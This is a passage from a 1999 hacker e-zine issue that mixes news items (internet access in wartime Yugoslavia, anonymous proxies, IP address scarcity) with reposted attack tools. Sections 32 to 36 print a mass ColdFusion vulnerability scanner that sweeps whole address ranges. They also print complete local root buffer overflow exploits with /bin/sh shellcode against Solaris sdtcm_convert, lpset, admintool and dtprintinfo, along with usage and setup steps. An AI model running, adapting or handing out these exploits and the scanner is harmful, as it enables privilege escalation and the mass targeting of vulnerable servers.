three to four minutes. But if your computer uses FAT 16, then it will recover all data after the first partition,
limiting the recovery to between 40 and 60 percent," Sharif said. He added that the antidote doesn't work on hard
drives with a capacity of 8G bytes or more.
The program is free to use and has been posted on the Web at http://members.xoom.com/monirdomain for
anybody who wants to download it. A new and improved version for machines that use FAT 16 will be ready
within days and followed by one for large-capacity hard drives. Sharif said he has received 3,000 hits and
innumerable e-mail messages since he put MRECOVER on the Internet May 5, but the inventor
doesn't see any commercial gain from the program.
Sharif, who was born in England and spent his early childhood there, graduates next June. He said his
ambition is to head to the U.S. for higher studies.
"I would like to go to the U.S. to do a master's in computer science. But it's unlikely that I will specialize in
antivirus programs. I still find general programming much more interesting," he said.
@HWA
29.0 Anonymous web browsing from 303.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Anonymous Web Surfing
Contributed by Netmask
303.org is now offering anonymous web surfing. By setting your browser to use 303.org as the http
proxy server, and port 1050. This server will forward the type of client you use, but not the IP
address. More info available at 303.org
http://www.303.org
@HWA
30.0 Yugoslavia Offline?
~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
YUGOSLAVIA OFFLINE
by BHZ, Wednesday 12th May 1999 on 9:30 pm CET
It looks like Yugoslavia's Internet users will be offline for a long time. As stated on
www.beograd.com "We have reliable information that the US Government ordered
shut down of satellite feeds for Internet customers in Yugoslavia, as a result of NATO
air war against this country. This action might be taken as soon as later tonight or
tomorrow (May 12 or 13, 1999)". Press release below.
May 12, 1999
US shuts down Yugoslav Internet - For immediate
release
BELGRADE, MAY 12 - We have reliable information
that the US Government ordered shut down of satellite
feeds for Internet customers in Yugoslavia, as a result
of NATO air war against this country.
This action might be taken as soon as later tonight or
tomorrow (May 12 or 13, 1999).
This is a flagrant violation of commercial contracts
with Yugoslav ISPs, as well as an attack on freedom of
the Internet.
A Web site in protest of these actions should be up
shortly. We will supply you with the URL. In the
meantime, please be so kind to inform as many people
as possible about this tragic event for the Internet
community in Yugoslavia and Europe.
BeoNET
Belgrade, Yugoslavia
May 13th
Contributed by cyberdiva
From Beograd.com:
16:50 According to the last information, "LORAL ORION" has given up, until further notice,
disconnecting Yugoslavia from Internet, because of the protests from all around the world
that followed the announcement
15:55 FONET - One of the biggest US communication satellites of the firm "LORAL ORION" has
informed Belgrade provider "Informatika" last night that because of "vis major" they wiould
have to stop Internet emitting toward all Yugoslav providers who are linked to providers
in USA. "This decision is the result of the executive order of the President of USA, Bill
Clinton, banning emitting of all services from USA into Federal Republic of Yugoslavia
(Serbia and Monte Negro)", says the message of "LORAL ORION" to the general Director of
"Informatika", Slobodan Sreckovic. "In accordance with that, LORAL ORION will, starting from
May 12, 1999, stop its services", it is said at the end of the statement. On Thursday, May 13,
in morning hours, "Informatika" confirmed to Fonet this has not
happened yet, but they are expecting to be disconnected from USA Internet satellite service toward
Yugoslavia any minute/hour now".
--diva
May 14th
RE: Internet connection in Yugoslavia
Now the mainstream media has picked it up and although Loral for the time has relented, it looks like
the Clinton administration is still considering it.
<http://www.foxnews.com/world/051499/kosovo_internet.sml>
Clinton Deciding Whether to Cut Yugoslavia Internet Access
I don't have to remind you there has been no formal declaration of WAR by the United States.
It makes me wonder how are private companies going to be able to secure global business if underneath
it all, they are forced to do the political bidding of the United States against their own customers...
Hacker News Network is doing an expose on the story going up today as well.
Thanks for hearing me out...
--diva
FoxNews;
Clinton Deciding Whether to Cut
Yugoslavia Internet Access
8.08 a.m. ET (1208 GMT) May 14, 1999
WASHINGTON Confronted with a dilemma of war in the information age, the Clinton administration is trying to
decide whether its trade embargo extends to Internet access for some of Yugoslavia's citizens.
Loral Space and Communications Ltd. of New York said it may be forced to cut transmissions into Yugoslavia from
one of its satellites, which serves at least two of the country's major Internet providers.
"We're still not clear on this whole thing," said Jeannette Colnan, a spokeswoman for Loral Space.
President Clinton issued an executive order two weeks ago banning U.S. companies from selling or supplying to
Yugoslavia "any goods, software, technology or services," although the order allows for the "special consideration of
the humanitarian needs of refugees."
The National Security Council said information services are generally considered exempt from trade embargoes, but that
electronic commerce is affected. The Internet performs both functions.
"We'll need to inquire further about the appropriate applications of the law," said David Leavy, a spokesman for
the security council.
Loral Space said Thursday that it was discussing its obligations under the embargo with the Treasury
Department, which didn't respond to requests for comment.
Experts said any move by the United States to limit civilian use of the Internet would be unprecedented.
NATO has already attacked Serbian broadcast stations to stem what it describes as propaganda, and Serbs have
established an extraordinary network on the Internet criticizing ongoing air strikes.
But the Internet also serves as a conduit for civilians to receive unadulterated news reports about NATO efforts.
"The Internet remains at this point one of the major sources inside Yugoslavia for
objective news reporting about the war," said Jim Dempsey of the
Washington-based Center for Democracy and Technology.
Word of the threat to shut down Internet access to at least parts of Yugoslavia
spread quickly across the global network, where it was condemned in some e-mail
messages and online discussion groups.
"To put it bluntly, we somehow got used to air-raid sirens, bombings and threats of
invasion, but we don't know how we're going to survive without the Internet," said
Alex Krstanovic, co-founder of Beonet, one of the Internet providers in Yugoslavia.
But some argued that access should be cut off.
"Continuing to provide these services would be kind of like giving aid to the enemy,"
one person wrote.
The possible loss of Internet access also illustrated the fragility of the computer
network and the importance assigned to it internationally.
Computer traffic in Yugoslavia uses both satellite and traditional land-based
telephone lines, but the loss of the Loral satellite could dramatically reduce the
Internet bandwidth available to citizens there, causing slow connections or even
blackouts.
Web sites reliant on the Loral satellite continued to be accessible overnight
Thursday, and there were no substantiated reports of anyone unable to retrieve
information from outside the country using the Internet.
A spokeswoman at the organization that registers Web addresses ending with the
country's "yu" suffix said that she was familiar with the reports but that there had
been no problems yet.
@HWA
31.0 Spam Recycling site deals with spammers for you
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Who75
http://www.maximumpcmag.com/inside_sources/99.5/99.5.11.phtml
Site Offers To ''Recycle'' Spam
If you feel guilty about tossing an aluminum can in the garbage, spamrecycle.com
may be the site for you.
The site is offering to "recycle" spam you send the site and submit it for complaint
to the proper authorities. Although it may sound like a shell company spam artists
use to farm more e-mail accounts, spamrecycle.com is supported by the Coalition
Against Unsolicited Commercial E-mail.
Spamrecycle.com officials said the site was created to help people fight spam. Many spam perpetrators
give e-mail addresses that offer to remove the spam victim from further unsolicated email.
Unfortunately, in many cases, the e-mail only validates the victim's e-mail address, causing more spam
to pour in.
Spamrecycle.com is sponsored by CDnow.com, which is giving people who recycle their spam a $5
coupon towards purchases from the site.
@HWA
32.0 quickie.c by Bronc Buster, a Cold Fusion vulnerability scanner
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security
http://www.genocide2600.com/~tattooman/new.shtml
/*
Quickie Coldfusion exploit finder v1.0
After seeing all the super lame hacks by groups desperatly seeking media wh0rage, like
JPs new favorite group, Team spl0it, and all the lame crap they were using, I deciced
to help them in their quest to look lame. Most of the 'tools' these people were
releasing were nothing more then modified versions of my cgiscanner (cgiscan.c), so
here is a newly coded, faster scanner for them to use and rip off. If I find this code,
like the rest of my code, on JPs code site, with my name cleaverly removed, I am going
to go take a shit on the hood of his car.
This should also give McIntyre and Jericho some more sites to put in their hacked site
archive on attrition.org that JP can rip off to. They have already shit on his car.
This scanner scans an entire class C address, and does it with no bull. Enter the
starting IP address, then the one you want to to stop on, and it will scan each box for
the 3 parts of the bug.
complies on HP-UX, Linux, *BSD
to compile:
luser$ gcc quickie.c -o quickie
to run:
luser$ ./quickie 123.123.123.2 123.123.123.254 >> somelog &
coded by Bronc Buster
May 1999
*/
#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
/* sets the timeout for connect() - you can change it if you want */
#define TOUT 2
/*****************************************************/
/* begin eLe3t prototypes */
/*****************************************************/
void phalse(int signo);
int connect_time(int sockfd, struct sockaddr *saptr, int salen, int nsec);
void clean(char b[1024]);
/*****************************************************/
/* end eLe3t prototypes */
/*****************************************************/
int main(int argc, char **argv)
{
char *temp;
char *ip_ptr;
char buff[1024]; /* who cares, we only want to HTTP header */
int f1,f2,f3,f4; /* f1.f2.f3.f4 when we disassemble first IP */
int l1,l2,l3,l4; /* l1.l2.l3.l4 when we disassemble last IP */
int i, tmp, n, lame;
int sock;
struct sockaddr_in target;
char *coldf[4];
char *dis[4];
/* this is just for a pretty print */
dis[1] = "openfile.cfm";
dis[2] = "exprcalc.cfm";
dis[3] = "displayopenedfile.cfm";
/* checks for coldfusion bugs */
coldf[1] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n";
coldf[2] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n";
coldf[3] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n";
if(argc<2) exit(printf("\nUsage: %s start_ip ending_ip\n",argv[0]));
printf("\n** A fast coldfusion exploit finder **");
printf("\ncoded by Bronc Buster - May 99\n");
/* parse ripped from HoGs HeaD domain scanner with a little */
/* modification - works good */
/* parse first ip - sorry no error checking */
temp=argv[1];
ip_ptr=(char *)strtok(temp,"."); /* get first field and look for . */
f1=atoi(ip_ptr);
ip_ptr=(char *)strtok(NULL,"."); /* null pointer set, get next field */
f2=atoi(ip_ptr);
ip_ptr=(char *)strtok(NULL,"."); /* null pointer set, get next field */
f3=atoi(ip_ptr);
ip_ptr=(char *)strtok(NULL,"."); /* null pointer set, get next field */
f4=atoi(ip_ptr);
/* parse second ip */
temp=argv[2];
ip_ptr=(char *)strtok(temp,"."); /* get first field and look for . */
l1=atoi(ip_ptr);
ip_ptr=(char *)strtok(NULL,"."); /* null pointer set, get next field */
l2=atoi(ip_ptr);
ip_ptr=(char *)strtok(NULL,"."); /* null pointer set, get next field */
l3=atoi(ip_ptr);
ip_ptr=(char *)strtok(NULL,"."); /* null pointer set, get next field */
l4=atoi(ip_ptr);
/* end parsing */
/* class C range checking - morons 'might' use the - hehehe */
if(f4<2 || l4>254)
exit(printf("IP Numbers out of range\n"));
/* class C only - anyone with a brain can make */
/* this scan class B or A nets - wow kidiez! */
for (i=f4;i<=l4;i++)
{
/* reconstruct the IP into a string */
sprintf(temp,"%d.%d.%d.%d",f1,f2,f3,i);
bzero(&target,sizeof(target));
target.sin_addr.s_addr=inet_addr(temp);
target.sin_family=AF_INET;
target.sin_port=htons(80);
/* ok, so this is a lame loop */
for(lame=1;lame;lame--)
{
printf("\nChecking %s:",temp);
/* check for all 3 before we jump for joy */
for(n=1;n<4;n++)
{
sock=socket(AF_INET,SOCK_STREAM,0);
if(sock<0)
exit(printf("Error getting socket - socket()\n"));
if(connect_time(sock,(struct sockaddr *)&target,sizeof(target),TOUT)==-1)
{
close(sock);
printf("\n no HTTPD responce");
}
else
{
printf("\n checking for %s - ",dis[n]);
send(sock,coldf[n],strlen(coldf[n]),0);
recv(sock, buff, sizeof(buff),0);
if(strstr(buff,"200"))
{
close(sock);
clean(buff);
printf(" FOUND",dis[n]);
}
else
{
close(sock);
clean(buff);
printf(" not found",dis[n]);
}
}
}
}
}
printf("\n\nScan finished!\n");
printf("Have fun kiddies!\n");
return 0;
}
/**************************************************************/
/* eLe3t functions */
/**************************************************************/
/* fake return function for connect_time() */
void phalse(int signo)
{
return;
}
/* connect with timeout - for speed!@$(*%^@ */
int connect_time(int sockfd, struct sockaddr *saptr, int salen, int nsec)
{
int s;
alarm(0);
signal(SIGALRM,phalse);
alarm(nsec);
if((s=connect(sockfd,(struct sockaddr *)saptr,salen))<0)
{
close(sockfd);
if(errno==EINTR);
errno=ETIMEDOUT;
}
alarm(0);
signal(SIGALRM, SIG_DFL);
return (s);
}
/* clean out buffer so we don't get fake readings */
void clean(char b[1024])
{
int i;
for(i=0;i<=strlen(b);i++)
b[i]=NULL;
}
/* EOF */
@HWA
33.0 sdtcm_convert local root overflow exploit for Sparc
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security
http://www.genocide2600.com/~tattooman/new.shtml
/*=============================================================================
sdtcm_convert Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
[usage]
% gcc ex_sdtcm_convert.c (This example program)
% a.out
If no response, hit ctrl+c
#
=============================================================================
*/
#define ADJUST 2
#define OFFSET1 4000
#define LENGTH1 260
#define OFFSET2 6000
#define LENGTH2 1000
#define OFFSET3 6000+16*30
#define NOP 0xa61cc013
char exploit_code[] =
"\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";
unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
unsigned long ret_adr;
int i;
main()
{
static char x[11000];
memset(x,'a',10000);
ret_adr=get_sp()-6300;
for (i = 0; i < 5000 ; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
ret_adr=get_sp() - 10200;
if ((ret_adr & 0xff )==0) ret_adr+=4;
printf("%lx\n",ret_adr);
for (i = OFFSET1+ADJUST; i < OFFSET1+LENGTH1 ; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
for (i = OFFSET2+ADJUST; i < OFFSET2+LENGTH2 ; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++) x[OFFSET3+ADJUST+i]=exploit_code[i];
x[10000]=0;
execl("/usr/dt/bin/sdtcm_convert", "sdtcm_convert", "-d",x,"test",(char *) 0);
}
@HWA
34.0 lpset local root overflow exploit for x86
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security
http://www.genocide2600.com/~tattooman/new.shtml
/*=============================================================================
ex_lpset.c Overflow Exploits( for Intel x86 Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
[usage]
% gcc ex_lpset.c (This example program)
% a.out
#
=============================================================================
*/
#define ADJUST 3
#define OFFSET 0x3b88
#define STARTADR 700
#define ENDADR 1200
#define EX_STADR 8000
#define BUFSIZE 22000
#define NOP 0x90
unsigned long ret_adr;
int i;
char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff\x55"
"\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33\xc0"
"\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e"
"\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3"
"\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46\x08"
"\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01\xe8"
"\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";
unsigned long get_sp(void)
{
__asm__(" movl %esp,%eax ");
}
static char x[BUFSIZE];
main(int argc, char **argv)
{
memset(x,NOP,18000);
ret_adr=get_sp()-OFFSET;
printf("Jumping Address = 0x%lx\n",ret_adr);
for (i = ADJUST+STARTADR; i<ENDADR ; i+=4){
x[i+2]=ret_adr & 0xff;
x[i+3]=(ret_adr >> 8 ) &0xff;
x[i+0]=(ret_adr >> 16 ) &0xff;
x[i+1]=(ret_adr >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++) x[i+EX_STADR]=exploit_code[i];
x[5000]='=';
x[18000]=0;
execl("/usr/bin/lpset","lpset","-n","xfn","-a",x,"lpcol1",(char *) 0);
}
@HWA
35.0 admintool local root exploit for solaris x86 machines
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security
http://www.genocide2600.com/~tattooman/new.shtml
/*=============================================================================
admintool Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
[usage]
% setenv DISPLAY yourdisplay (ex. setenv DISPLAY 192.168.0.100:0.0)
% gcc ex_admintool.c (This example program)
% a.out
( [Browse] -> [Software] -> [Edit] -> [Add] -> [Harddisk]
-> Directory: /tmp -> [Ok] )
#
In /tmp/EXP directory, the temp files are made, please remove it.
=============================================================================
*/
#include <stdio.h>
#define ADJUST1 2
#define ADJUST2 1
#define BUFSIZE1 1000
#define BUFSIZE2 800
#define OFFSET 3600
#define OFFSET2 400
#define PKGDIR "mkdir /tmp/EXP"
#define PKGINFO "/tmp/EXP/pkginfo"
#define PKGMAP "/tmp/EXP/pkgmap"
#define NOP 0xa61cc013
char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
unsigned long ret_adr;
static char x[500000];
FILE *fp;
int i;
main()
{
system(PKGDIR);
putenv("LANG=");
if ((fp=fopen(PKGMAP,"wb"))==NULL){
printf("Can not write '%s'\n",PKGMAP);
exit(1);
}
fclose(fp);
if ((fp=fopen(PKGINFO,"wb"))==NULL){
printf("Can not write '%s'\n",PKGINFO);
exit(1);
}
fprintf(fp,"PKG=");
ret_adr=get_sp()-OFFSET;
while ((ret_adr & 0xff000000) == 0 ||
(ret_adr & 0x00ff0000) == 0 ||
(ret_adr & 0x0000ff00) == 0 ||
(ret_adr & 0x000000ff) == 0)
ret_adr += 4;
printf("Jumping address = %lx\n",ret_adr);
memset(x,'a',4);
for (i = ADJUST1; i < 1000; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >>8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
x[BUFSIZE1]=0;
fputs(x,fp);
fprintf(fp,"\n");
fprintf(fp,"NAME=");
memset(x,'a',4);
for (i = ADJUST2; i < BUFSIZE2; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0; i<strlen(exploit_code); i++)
x[i+ADJUST2+OFFSET2]=exploit_code[i];
x[BUFSIZE2]=0;
fputs(x,fp);
fprintf(fp,"\n");
fprintf(fp,"VERSION=1.00\n");
fprintf(fp,"ARCH=sparc\n");
fprintf(fp,"CLASSES=none\n");
fprintf(fp,"CATEGORY=application\n");
fprintf(fp,"PSTAMP=990721\n");
fprintf(fp,"BASEDIR=/\n");
fclose(fp);
system("admintool");
}
@HWA
36.0 dtprintinfo buffer overflow exploit for solarix x86 machines..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 10 May 1999 02:12:29 JST
From: "UNYUN@ShadowPenguin" <yuuzy@USA.NET>
To: BUGTRAQ@netspace.org
Subject: Solaris2.6,2.7 dtprintinfo exploits
Hello.
"dtprintinfo" is suid program, the stack buffer can be overflowed by '-p'
option. I made an exploit program that can get root for Intel edition of
Solaris2.6 and Solaris 2.7.
Please test it.
If you test this program, please set DISPLAY environment correctly
before execution.
/*========================================================================
ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
========================================================================
*/
static char x[1000];
#define ADJUST 0
#define STARTADR 621
#define BUFSIZE 900
#define NOP 0x90
unsigned long ret_adr;
int i;
char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
"\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
"\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
"\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
"\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
"\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";
unsigned long get_sp(void)
{
__asm__(" movl %esp,%eax ");
}
main()
{
putenv("LANG=");
for (i=0;i<BUFSIZE;i++) x[i]=NOP;
for (i=0;i<strlen(exploit_code);i++)
x[STARTADR+i]=exploit_code[i];
ret_adr=get_sp() - 1292 + 148;
for (i = ADJUST; i < 400 ; i+=4){
x[i+0]=ret_adr & 0xff;
x[i+1]=(ret_adr >> 8 ) &0xff;
x[i+2]=(ret_adr >> 16 ) &0xff;
x[i+3]=(ret_adr >> 24 ) &0xff;
}
x[BUFSIZE]=0;
execl("/usr/dt/bin/dtprintinfo", "dtprintinfo",
"-p",x,(char *) 0);
}
--------------------------------------------------------------------
Date: Mon, 10 May 1999 13:15:36 JST
From: "UNYUN@ShadowPenguin" <yuuzy@USA.NET>
To: BUGTRAQ@netspace.org
Subject: Re: [Solaris2.6,2.7 dtprintinfo exploits]
Sorry, I forgot to to write the following things...
Before execution of dtprintinfo exploit, please make a dummy
lpstat command.
for example,
% cat > lpstat
echo "system for lpprn: server.com"
^D
% chmod 755 lpstat
% setenv PATH .:$PATH
% gcc ex_dtprintinfo.c
% a.out
Following exploit program is for Sparc Solaris.
I tested on Solaris2.6.
/*========================================================================
ex_dtprintinfo.c Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
=========================================================================
*/
#define ADJUST 0
#define OFFSET 1144
#define STARTADR 724
#define BUFSIZE 900
#define NOP 0xa61cc013
static char x[1000];
unsigned long ret_adr;
int i;
char exploit_code[] =
"\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";
unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
main()
{
putenv("LANG=");
for (i = 0; i < ADJUST; i++) x[i]=0x11;
for (i = ADJUST; i < 900; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i];
ret_adr=get_sp()-OFFSET;
printf("jumping address : %lx\n",ret_adr);
if ((ret_adr & 0xff) ==0 ){
ret_adr -=16;
printf("New jumping address : %lx\n",ret_adr);
}
for (i = ADJUST; i < 600 ; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
x[BUFSIZE]=0;
execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p",x,(char *) 0);
}
The Shadow Penguin Security
(http://base.oc.to/skyscraper/byte/551)
UNYUN (unewn4th@usa.net)
@HWA
37.0 Are we running out of IP numbers? how many class c's are left??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Net number system at a crossroads
By Dan Goodin and Courtney Macavinta
Staff Writers, CNET News.com
NEWS.COM
May 12, 1999, 4 a.m. PT
URL: http://www.news.com/SpecialFeatures/0,5,36425,00.html
special feature Alongside the highly public debate over domain names, a little-understood predicament--with
more far-reaching consequences--is confronting the new nonprofit corporation in charge of the Net's
administration.
Forget about ".com." The critical resource under the Net's hood is numerical addresses, and the Internet
Corporation for Assigned Names and Numbers now is in charge of those, too.
Every online device or computer needs an Internet Protocol (IP) numerical address to connect to the global
network. When the system was being designed, hardly anyone imagined that its 4.2 billion unique addresses
would ever be exhausted. Just a few decades later, however, some in the technical community fear that the rapid
pace of innovation one day may cause the Net to run out of numbers.
Demand for IP numbers is naturally growing due to the Net's evolution as a meeting place and marketplace. Further
draining the IP pool is the aggressive rollout of "always on" cable Net access and the array of handheld devices
that need dedicated IP numbers.
Currently, most online access providers and companies utilize a small batch of IP addresses by dynamically
assigning the numbers based on demand when people log on to their networks. But with broadband services such as
cable, customers must have their own dedicated number.
"It's going to come to the point where your TV remote is speaking IP to your TV, and they'll each need an IP
address," said Paul Vixie,
an architect of the Net's address system. Under such a scenario, a typical household could have more than 250 IP
addresses, he added.
In a way the potential shortage of IP addresses is most analogous to the shortage of phone numbers that came about
with the advent of fax machines and cellular phones, which has spurred the addition of new area codes.
And the perceived scarcity of addresses is just the beginning. As more computers connect to the Net, the databases
that map the numbers are growing larger and becoming unwieldy. The ever-increasing size of the network's so-called
routing tables has some Net programmers worried.
"There's going to be a point when machines can't handle the size," said Kim Hubbard, president of the American
Registry for Internet Numbers, which is responsible for allocating and assigning IP addresses in the Americas.
Although there is hope that a new standard, IP version 6 (IPV6), could help alleviate both problems, the timeline for
a rollout is sketchy--estimates range from the next 5 to 25 years. That's why many in the Net addressing trenches
agree that allocation of these precious resources must meet strict guidelines.
"There is this constant tension about whose interest is being served," said Tony Rutkowski, principal consultant for
the Next Generation Internet and a founder of the Internet Society. "It's a combination of how these IP addresses
are allocated and to whom--and that is the rub."
New nonprofit in the middle
And now ICANN, which is mediating a number of other contentious debates, finds itself in the middle of the
long-standing, international struggle over who should hold the key to the IP address treasure chest.
At a public meeting in Berlin later this month, ICANN is expected to take its most definitive step on the issue,
creating an organization to tackle IP addressing.
Since last November, ICANN has been charged with overseeing the Net's technical administration, under a Memorandum Of
Understanding it signed with the Commerce Department. ICANN also has been recognized by more than 25 nations in its new
role.
So far, ICANN's challenges posed by IP numbering have been overshadowed by other topics, such as authorizing new companies
to register domains ending in ".com" or adding new top-level domains such as ".web" and ".firm." Along with the fact that
domains have been a well-publicized issue, ICANN's leaders also don't see the IP address issue as terribly pressing.
"We haven't needed to do anything in the way of [IP address] policy yet," said Michael Roberts, ICANN's interim chief
executive. "There is potential scarcity. The thing to do is get moving on IPV6, which will deploy in an open and fair way
based on reasonable need."
But a failure to adequately tackle a range of problems surrounding IP addresses ultimately could cripple the Net. In fact,
charting a new IP numbering course may prove to be ICANN's most important contribution.
Chain of command gets longer In the past, policy and oversight of IP addresses has been left to the Internet Assigned Numbers
Authority, the government-funded group that designed the numbering system under the leadership of the late Jon Postel. Under
ICANN, the Internet Assigned Numbers Authority still distributes address space to three geographically diverse Regional Internet
Registries (RIRs), which typically hand out the addresses to large end users such as Internet service providers and universities.
ICANN will be operating under the same bottom-line principles that have guided the Internet Assigned Numbers Authority for the
past three years. They call for a system that conserves addresses and routes Internet traffic more efficiently.
The Internet Assigned Numbers Authority's functions may still be in place, but the chain of command is set to be dramatically
altered. Whereas the buck used to stop at Postel, now it will stop at the ICANN board, which ultimately will be advised--and
elected--by many representatives in the Net community, including regular online users.
Some veteran Netizens view the shift as necessary, but potentially problematic.
"One of the advantages of [the Internet Assigned Numbers Authority]--and one of its
disadvantages--is that it rested with a single individual, and a single individual could
easily make a decision," said Bill Manning, a staffer with the University of Southern
California's Information Sciences Institute, which housed the Internet Assigned Numbers
Authority and also was headed by Postel. "That nimbleness in being able to respond seems
to be a necessary casualty in making [the] transition" to a privatized Internet.
In keeping with its mission to turn over Net governance to the private sector, ICANN has
